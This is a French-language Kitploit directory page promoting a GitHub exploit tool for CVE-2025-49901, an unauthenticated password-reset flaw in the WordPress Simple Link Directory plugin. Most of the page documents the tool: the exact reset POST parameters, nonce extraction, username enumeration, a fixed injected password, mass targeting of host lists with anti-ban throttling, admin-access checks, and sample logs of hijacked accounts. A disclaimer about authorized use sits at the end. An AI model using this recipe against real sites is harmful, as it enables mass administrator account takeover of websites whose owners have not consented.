Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-49901 — WordPress Simple Link Directory Plugin < 14.8.1 est vulnérable à une authentification cassée de haute priorité. | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-49901
Authentification et AutorisationReconnaissanceAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications Web
GitHubnxploited/cve-2025-49901

CVE-2025-49901

WordPress Simple Link Directory Plugin < 14.8.1 est vulnérable à une authentification cassée de haute priorité.

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-49901

Le plugin WordPress Simple Link Directory < 14.8.1 est vulnérable à une faille de contournement d'authentification à priorité élevée (Broken Authentication).

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║        CVE-2025-49901  ·  Simple Link Directory  ·  qc-opd       ║
║           Authentication Bypass → Password Reset → RCE           ║
╚═══════════════════════════════════════════════════════════════════╝

CVE CVSS Plugin Auth Python Author


▸ Vulnérabilité

Le formulaire de réinitialisation de mot de passe qc-opd exposé sur les pages SLD accepte un nom d'utilisateur et un nouveau mot de passe sans vérifier l'identité de l'utilisateur via un jeton, une confirmation par e-mail ou une vérification des capacités. Un attaquant non authentifié peut énumérer les noms d'utilisateur WordPress, soumettre le formulaire de réinitialisation pour n'importe quel compte et s'authentifier immédiatement avec le mot de passe injecté — obtenant ainsi un accès administrateur sans aucune interaction de la part de l'utilisateur ciblé.


▸ Déroulement de l'attaque

root@kitploit:~
┌─────────────────────────────────────────────────────────┐
│  1. Locate SLD reset page                               │
│     Probe 28+ paths → match: "sld" + "_wpnonce" + form  │
│                                                         │
│  2. Extract nonce                                       │
│     Parse _wpnonce from HTML / JS / qc-opd-nonce        │
│                                                         │
│  3. Enumerate usernames                                 │
│     /?author=1..10  +  /wp-json/wp/v2/users  + hostname │
│                                                         │
│  4. Reset password for each username                    │
│     POST qc-restore-pwd=restore                         │
│         qc-uid=<username>                               │
│         pass=newhackerpass123                           │
│         _wpnonce=<nonce>                                │
│                                                         │
│  5. Verify access (dual mode)                           │
│     Session mode  → cookie check + /wp-admin/ probes    │
│     Password mode → wp-login.php + admin panel check    │
│                                                         │
│  6. Write confirmed hits → scan_results/reset_mass_success.txt │
└─────────────────────────────────────────────────────────┘

▸ Installation

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-49901.git
cd CVE-2025-49901
pip install requests colorama urllib3
python3 CVE-2025-49901.py

requirements.txt

root@kitploit:~
requests>=2.28.0
colorama>=0.4.6
urllib3>=1.26.0

▸ Utilisation

root@kitploit:~
Targets list file          →  list.txt  (one host per line)
Threads                    →  default 5
HTTP timeout               →  default 10s
Per-user delay MIN/MAX     →  anti-ban throttle  (default 0.3 / 0.7s)
Delay between sites        →  default 1.0s
Output file                →  scan_results/reset_mass_success.txt

Format des cibles :

root@kitploit:~
https://target1.com
target2.com
http://target3.com/wordpress

Mot de passe fixe injecté pour toutes les réinitialisations :

root@kitploit:~
newhackerpass123

▸ Sources d'énumération des noms d'utilisateur

MéthodePoint de terminaison
Redirection auteur →

▸ Logique de vérification de l'administrateur

Après chaque tentative de réinitialisation, l'outil vérifie l'accès à l'aide de deux méthodes indépendantes :

root@kitploit:~
Session mode   →  checks wordpress_logged_in cookie + /wp-admin/ indicators
Password mode  →  full wp-login.php POST + multi-path admin panel probe

Indicateurs d'administrateur vérifiés :

root@kitploit:~
id="adminmenu"  ·  id="wpadminbar"  ·  id="wpwrap"
users.php  ·  plugins.php  ·  plugin-install-tab  ·  upload-plugin

▸ Format de sortie du terminal

root@kitploit:~
[HH:MM:SS] [https://target.com] NONCE: OK   | RESET: OK   | ACCESS: 1 HIT
[HH:MM:SS] [https://target2.com] NONCE: FAIL | RESET: -    | ACCESS: 0 HIT

▸ Fichier de sortie

scan_results/reset_mass_success.txt

root@kitploit:~
[2025-06-01T14:22:10] https://target.com - account=admin  pass=newhackerpass123  mode=password
[2025-06-01T14:22:18] https://target.com - account=editor pass=newhackerpass123  mode=session

▸ Auteur

root@kitploit:~
Nxploited (Khaled Alenazi)
GitHub   →  https://github.com/Nxploited
Telegram →  @KNxploited

GitHub Telegram


▸ Avertissement

root@kitploit:~
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.

The author bears no responsibility for use against systems
the operator does not own or have explicit written permission to test.

Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide.
You alone are responsible for your actions.

© 2025 Nxploited · Simple Link Directory < 14.8.1 · Corrigé dans 14.8.1

Télécharger l’outil
CVECVE-2025-49901
CVSS9.8 CRITIQUE — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ADPCISA-ADP
Pluginquantumcloud Simple Link Directory (qc-simple-link-directory)
Versions concernéesToutes les versions < 14.8.1
AuthentificationAucune requise
TypeContournement d'authentification via un chemin alternatif (CWE-288)
CWECWE-288 · Authentication Bypass Using an Alternate Path or Channel
/?author=1
/?author=10
REST API/wp-json/wp/v2/users
Nom d'hôtePremière étiquette du domaine en secours
Codé en duradmin toujours inclus